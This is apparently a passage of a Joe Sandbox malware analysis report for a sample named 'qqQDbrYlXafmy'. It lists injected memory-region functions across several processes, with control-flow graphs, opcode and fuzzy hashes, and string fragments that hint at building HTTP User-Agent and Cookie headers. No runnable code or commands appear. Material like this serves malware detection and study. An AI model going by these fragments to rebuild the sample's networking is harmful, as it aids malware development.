                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 894153B6500208BFEF129F65CC84BDEBBBAEF84704F154059EA44AB254DB34A650CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0252093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 252093e-252095f call 2520cc4 call 25214bc call 2523cc0 8 2520967-2520989 0->8 10 2520af1-2520af2 8->10 11 252098f-25209d2 call 25209d9 8->11 15 25209d4-25209d5 11->15 16 2520a3d-2520a80 11->16 17 25209d7-25209e8 call 2523653 15->17 18 2520a3c 15->18 21 2520a82-2520aae 16->21 22 2520aec call 2520af3 16->22 17->22 29 25209ee-2520a10 17->29 18->16 21->22 27 2520ab0-2520abc 21->27 22->10 31 2520ac1-2520ae5 27->31 29->22 33 2520a16-2520a3b 29->33 31->10 37 2520ae7-2520aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 4e53e86d25cf354abe0c1fe00c78c106535cfa79f524aee6569dc90e53cb133a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: D551C2315442649FEB135F20CC84B9A7BBCBF05744F4401D9BA49FE0D6DBB09694CA69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 025214BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 25214bc-2521590 call 25214de call 2520c9c call 2521345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction ID: 15480ee9d0da39b35a24e6c4ed683b1bb61b75fa03f2d717df460b533e0a2f24
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21F172404A249EDF03AF60C9C88AB73EDFF41704F45456A9989EF089FA709558CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02521345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2521345-2521352 58 25213eb-25213ec 57->58 59 2521358-252135e 57->59 59->58 60 2521364-252137a 59->60 60->58 62 252137c-252138f 60->62 64 2521391-2521398 62->64 65 252139b-25213ab call 2520e7c 64->65 68 25213ad-25213e2 65->68 68->58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: c34cac81ca2a54af2047f823e6dce5caa0c4349e540f04abf438ae5ddc9a3858
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21AE31904226AFEF219F78C984B9DBBB6BF05300F058215F959BB5D5D730A804CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 025214DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 25214de-2521590 call 2523653 call 2520c9c call 2521345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction ID: 1ccee48c102eb3d13facdd217eaa8f6f091fce0379291ac89f1d510a8d4abd1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A11E2724049259EDF03AF20C5C8CAB73EDFE80704B45096A9D89EF489FE709158CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02523F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2523f0d-2523f29 call 2523653 call 252379f 92 2523f3b-2523f66 call 2523f78 * 3 87->92 93 2523f2b-2523f39 call 252401b 87->93 106 2523f71 92->106 100 2523f76-2523f77 93->100 106->100 107 2523f71 call 2523f78 106->107 107->100
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: c37496ef7cb5a9e785ec2f1acea20c84a0f064419f1817a37b47b474ee13eddf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F08230588261B6EF007B70EC496293AB97F82305F0404D0A949AD0D0DE3C85588E78
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02524674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2524674-252468d call 2523a1c 111 252468f-2524698 call 2523a6e 108->111 112 252469d-25246cd 108->112 111->112 115 25246d3-25246f5 112->115 116 25247e7-25247ec 112->116 115->116 118 25246fb-2524720 115->118 120 2524722-2524737 118->120 121 2524738-252475a 118->121 120->121 123 25247bf-25247c9 121->123 124 252475c-252477e 121->124 125 25247e0-25247e5 123->125 126 25247cb-25247dd call 2523673 123->126 124->123 130 2524780-25247a2 124->130 125->116 126->125 130->123 132 25247a4-25247bc 130->132 132->123
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: 209acdbf8bc3812c91cd9d63d5373dbac451190f4ec2b1ac215639bafcc46be2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B417FB6600218BFEF129F65CC44BEEBFBAFF81704F154069EA44AA294D7349644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02524675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2524675-2524680 134 252468b-252468d 133->134 135 2524686 call 2523a1c 133->135 136 252468f-2524698 call 2523a6e 134->136 137 252469d-25246cd 134->137 135->134 136->137 140 25246d3-25246f5 137->140 141 25247e7-25247ec 137->141 140->141 143 25246fb-2524720 140->143 145 2524722-2524737 143->145 146 2524738-252475a 143->146 145->146 148 25247bf-25247c9 146->148 149 252475c-252477e 146->149 150 25247e0-25247e5 148->150 151 25247cb-25247dd call 2523673 148->151 149->148 155 2524780-25247a2 149->155 150->141 151->150 155->148 157 25247a4-25247bc 155->157 157->148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 292d90d0bf46eb159d399dc0f792cda4e7ccf3e302cb50c2c6dc36f0939492fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: E24160B6600218BFEF125F65CC48BDEBFBAFF81704F154069EA44AA294D734D644CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 02B2093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 2b2093e-2b2095f call 2b20cc4 call 2b214bc call 2b23cc0 8 2b20967-2b20989 0->8 10 2b20af1-2b20af2 8->10 11 2b2098f-2b209d2 call 2b209d9 8->11 15 2b209d4-2b209d5 11->15 16 2b20a3d-2b20a76 11->16 17 2b209d7-2b209e8 call 2b23653 15->17 18 2b20a3c 15->18 19 2b20a7e-2b20a80 16->19 22 2b20aec call 2b20af3 17->22 30 2b209ee-2b20a10 17->30 18->16 21 2b20a82-2b20aae 19->21 19->22 21->22 27 2b20ab0-2b20abc 21->27 22->10 31 2b20ac1-2b20ae5 27->31 30->22 33 2b20a16-2b20a3b 30->33 31->10 37 2b20ae7-2b20aea 31->37 33->22 38 2b20a41-2b20a76 33->38 37->22 37->31 38->19
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 642f0cdef30638ee7e62bd0d56a159d3420231687b5fb4dd34291ed8c833b41b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D51C0312443649FEB23AF20CC84B9A37B8EF15744F4805D9BA49FE0D6DBB09684CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02B214BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 2b214bc-2b214df call 2b214de 42 2b21502-2b21590 call 2b21345 * 6 39->42 43 2b214e1-2b21500 call 2b20c9c 39->43 43->42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                                          • Instruction ID: e55ef4867d02beea403e1c7b5f4bacc5d535b8e99771bd5a4702776a73be1278
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF210172404624AEDF03AF60C9C8CA673EDEF40704F4545AA9D8DEF04AFA709158CEE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02B21345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 59 2b21345-2b21352 60 2b213eb-2b213ec 59->60 61 2b21358-2b2135e 59->61 61->60 62 2b21364-2b2137a 61->62 62->60 64 2b2137c-2b2138f 62->64 66 2b21391-2b21398 64->66 67 2b2139b-2b213ab call 2b20e7c 66->67 70 2b213ad-2b213e2 67->70 70->60
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 57eee09f676bfc3de9cfc0e7dc3b537727d2dab2a8cbc9f94935fc7a68492dd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21AE31904326AFEF21DE78C944B9DBBB6AF04300F058255F959BB595D730A805CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02B214DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 71 2b214de-2b21590 call 2b23653 call 2b20c9c call 2b21345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                                          • Instruction ID: 031a0f4533b5e31e3df3590ff3562678bc1a23f6da9b7f0fbac87eabe73d37f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3118F72404624AEEF03AF64C5C8CAA73EDEF40704B4549AA9D89EF449FE709158CEE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02B23F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 90 2b23f0d-2b23f29 call 2b23653 call 2b2379f 95 2b23f3b-2b23f66 call 2b23f78 * 3 90->95 96 2b23f2b-2b23f39 call 2b2401b 90->96 109 2b23f71 95->109 104 2b23f76-2b23f77 96->104 109->104 110 2b23f71 call 2b23f78 109->110 110->104
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                                          • Instruction ID: 41f751963cd2f988637d53eb1f9e227c3888f00b0c639003b9c73588746c20f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F08C305883A0ABEF00BBB0AC4966D32F9AF00305F0400D0AA8DAD0E0CE3C85988E71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02B24674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 111 2b24674-2b2468d call 2b23a1c 114 2b2468f-2b24698 call 2b23a6e 111->114 115 2b2469d-2b246cd 111->115 114->115 118 2b246d3-2b246f5 115->118 119 2b247e7-2b247ec 115->119 118->119 121 2b246fb-2b24720 118->121 123 2b24722-2b24737 121->123 124 2b24738-2b2475a 121->124 123->124 126 2b247bf-2b247c9 124->126 127 2b2475c-2b2477e 124->127 128 2b247e0-2b247e5 126->128 129 2b247cb-2b247dd call 2b23673 126->129 127->126 133 2b24780-2b247a2 127->133 128->119 129->128 133->126 135 2b247a4-2b247bc 133->135 135->126
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: a1c6371f28839a5899eb18149f578d75d5d5b74d8f2e64f8a6457625748807fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF4183B6600218BFEF129F65CC44BDEBFBAEF80704F1540A9EA44AA254D774D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02B24675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 136 2b24675-2b24680 137 2b2468b-2b2468d 136->137 138 2b24686 call 2b23a1c 136->138 139 2b2468f-2b24698 call 2b23a6e 137->139 140 2b2469d-2b246cd 137->140 138->137 139->140 143 2b246d3-2b246f5 140->143 144 2b247e7-2b247ec 140->144 143->144 146 2b246fb-2b24720 143->146 148 2b24722-2b24737 146->148 149 2b24738-2b2475a 146->149 148->149 151 2b247bf-2b247c9 149->151 152 2b2475c-2b2477e 149->152 153 2b247e0-2b247e5 151->153 154 2b247cb-2b247dd call 2b23673 151->154 152->151 158 2b24780-2b247a2 152->158 153->144 154->153 158->151 160 2b247a4-2b247bc 158->160 160->151
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 4c2a36df15a473cc6d4190318ef4517f0fb4ec64f4b452ce57c8f71c776fb928
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 304193B6600218BFEF125F65CC48BDEBFBAEF80704F1540A9EA44AA254D774D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0145093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 145093e-145095f call 1450cc4 call 14514bc call 1453cc0 8 1450967-1450989 0->8 10 1450af1-1450af2 8->10 11 145098f-14509d2 call 14509d9 8->11 15 14509d4-14509d5 11->15 16 1450a3d-1450a80 11->16 17 14509d7-14509e8 call 1453653 15->17 18 1450a3c 15->18 21 1450a82-1450aae 16->21 22 1450aec call 1450af3 16->22 17->22 29 14509ee-1450a10 17->29 18->16 21->22 27 1450ab0-1450abc 21->27 22->10 31 1450ac1-1450ae5 27->31 29->22 33 1450a16-1450a3b 29->33 31->10 37 1450ae7-1450aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 512fe28a7c623139a11723c52dc63ae868d0efa37cdbdbabb673543e91c5cbd3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 335191315442549FFF235F24CC85B9A7BB8AF14744F08019ABE49FE0E6DAB09990CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 014514BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 14514bc-1451590 call 14514de call 1450c9c call 1451345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                                          • Instruction ID: 6ca4c6c738d11e316478e1a65a6e7f3bb2c0cf25c202b65e81bf9a1fd8eefce5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4213072404614AEEB43AF60C8C8DA773ECEF50604F45096B9D85EF05AFEB09154CAE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01451345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
